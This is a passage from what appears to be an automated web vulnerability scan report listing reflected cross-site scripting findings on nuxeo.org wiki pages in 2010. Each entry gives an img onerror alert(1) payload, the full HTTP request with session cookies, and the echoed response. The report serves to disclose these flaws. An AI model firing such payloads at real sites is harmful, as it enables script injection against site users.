User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13083
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maind8263%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee718aef40bc/">Maind8263<img src=a onerror=alert(1)>e718aef40bc</a>
...[SNIP]...

4.459. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11711"><img%20src%3da%20onerror%3dalert(1)>f6ef0055e76 was submitted in the REST URL parameter 5. This input was echoed as 11711"><img src=a onerror=alert(1)>f6ef0055e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Ajax4JSF+Good+practices11711"><img%20src%3da%20onerror%3dalert(1)>f6ef0055e76 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13133
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Ajax4JSF+Good+practices11711%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef6ef0055e76?format=xar&amp;name=Main.Ajax4JSF Good practices11711"><img src=a onerror=alert(1)>f6ef0055e76&amp;pages=Main.Ajax4JSF Good practices11711">
...[SNIP]...

4.460. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bbc96<img%20src%3da%20onerror%3dalert(1)>aa677fb915a was submitted in the REST URL parameter 5. This input was echoed as bbc96<img src=a onerror=alert(1)>aa677fb915a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Ajax4JSF+Good+practicesbbc96<img%20src%3da%20onerror%3dalert(1)>aa677fb915a HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13071
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practicesbbc96%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaa677fb915a'>Ajax4JSF Good practicesbbc96<img src=a onerror=alert(1)>aa677fb915a</a>
...[SNIP]...

4.461. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37093"><img%20src%3da%20onerror%3dalert(1)>9c0dc50f03a was submitted in the REST URL parameter 4. This input was echoed as 37093"><img src=a onerror=alert(1)>9c0dc50f03a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main37093"><img%20src%3da%20onerror%3dalert(1)>9c0dc50f03a/AllDocs HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main37093%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9c0dc50f03a/AllDocs?format=xar&amp;name=Main37093"><img src=a onerror=alert(1)>9c0dc50f03a.AllDocs&amp;pages=Main37093">
...[SNIP]...

4.462. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a70b0<img%20src%3da%20onerror%3dalert(1)>7ba7318d99e was submitted in the REST URL parameter 4. This input was echoed as a70b0<img src=a onerror=alert(1)>7ba7318d99e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina70b0<img%20src%3da%20onerror%3dalert(1)>7ba7318d99e/AllDocs HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina70b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7ba7318d99e/">Maina70b0<img src=a onerror=alert(1)>7ba7318d99e</a>
...[SNIP]...

4.463. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f07c4<img%20src%3da%20onerror%3dalert(1)>404e6f1a573 was submitted in the REST URL parameter 5. This input was echoed as f07c4<img src=a onerror=alert(1)>404e6f1a573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/AllDocsf07c4<img%20src%3da%20onerror%3dalert(1)>404e6f1a573 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:36:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/AllDocsf07c4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E404e6f1a573'>AllDocsf07c4<img src=a onerror=alert(1)>404e6f1a573</a>
...[SNIP]...

4.464. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e77a3"><img%20src%3da%20onerror%3dalert(1)>5736c0fdff5 was submitted in the REST URL parameter 5. This input was echoed as e77a3"><img src=a onerror=alert(1)>5736c0fdff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/AllDocse77a3"><img%20src%3da%20onerror%3dalert(1)>5736c0fdff5 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/AllDocse77a3%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5736c0fdff5?format=xar&amp;name=Main.AllDocse77a3"><img src=a onerror=alert(1)>5736c0fdff5&amp;pages=Main.AllDocse77a3">
...[SNIP]...

4.465. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a6af0<img%20src%3da%20onerror%3dalert(1)>9ae92ff6482 was submitted in the REST URL parameter 4. This input was echoed as a6af0<img src=a onerror=alert(1)>9ae92ff6482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina6af0<img%20src%3da%20onerror%3dalert(1)>9ae92ff6482/BlogRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina6af0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9ae92ff6482/">Maina6af0<img src=a onerror=alert(1)>9ae92ff6482</a>
...[SNIP]...

4.466. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d0b"><img%20src%3da%20onerror%3dalert(1)>f559c3eb1fc was submitted in the REST URL parameter 4. This input was echoed as b9d0b"><img src=a onerror=alert(1)>f559c3eb1fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb9d0b"><img%20src%3da%20onerror%3dalert(1)>f559c3eb1fc/BlogRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:12:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb9d0b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef559c3eb1fc/BlogRss?format=xar&amp;name=Mainb9d0b"><img src=a onerror=alert(1)>f559c3eb1fc.BlogRss&amp;pages=Mainb9d0b">
...[SNIP]...

4.467. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ae0"><img%20src%3da%20onerror%3dalert(1)>7936f7b7411 was submitted in the REST URL parameter 5. This input was echoed as b0ae0"><img src=a onerror=alert(1)>7936f7b7411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BlogRssb0ae0"><img%20src%3da%20onerror%3dalert(1)>7936f7b7411 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BlogRssb0ae0%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7936f7b7411?format=xar&amp;name=Main.BlogRssb0ae0"><img src=a onerror=alert(1)>7936f7b7411&amp;pages=Main.BlogRssb0ae0">
...[SNIP]...

4.468. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f4e8d<img%20src%3da%20onerror%3dalert(1)>30d9f92f005 was submitted in the REST URL parameter 5. This input was echoed as f4e8d<img src=a onerror=alert(1)>30d9f92f005 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BlogRssf4e8d<img%20src%3da%20onerror%3dalert(1)>30d9f92f005 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BlogRssf4e8d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E30d9f92f005'>BlogRssf4e8d<img src=a onerror=alert(1)>30d9f92f005</a>
...[SNIP]...

4.469. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d8b"><img%20src%3da%20onerror%3dalert(1)>619a28fe25b was submitted in the REST URL parameter 4. This input was echoed as d1d8b"><img src=a onerror=alert(1)>619a28fe25b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maind1d8b"><img%20src%3da%20onerror%3dalert(1)>619a28fe25b/BookAdminMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:06 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maind1d8b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E619a28fe25b/BookAdminMoved?format=xar&amp;name=Maind1d8b"><img src=a onerror=alert(1)>619a28fe25b.BookAdminMoved&amp;pages=Maind1d8b">
...[SNIP]...

4.470. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d9ef<img%20src%3da%20onerror%3dalert(1)>5eb223d685 was submitted in the REST URL parameter 4. This input was echoed as 4d9ef<img src=a onerror=alert(1)>5eb223d685 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main4d9ef<img%20src%3da%20onerror%3dalert(1)>5eb223d685/BookAdminMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:02 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12949
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main4d9ef%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5eb223d685/">Main4d9ef<img src=a onerror=alert(1)>5eb223d685</a>
...[SNIP]...

4.471. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
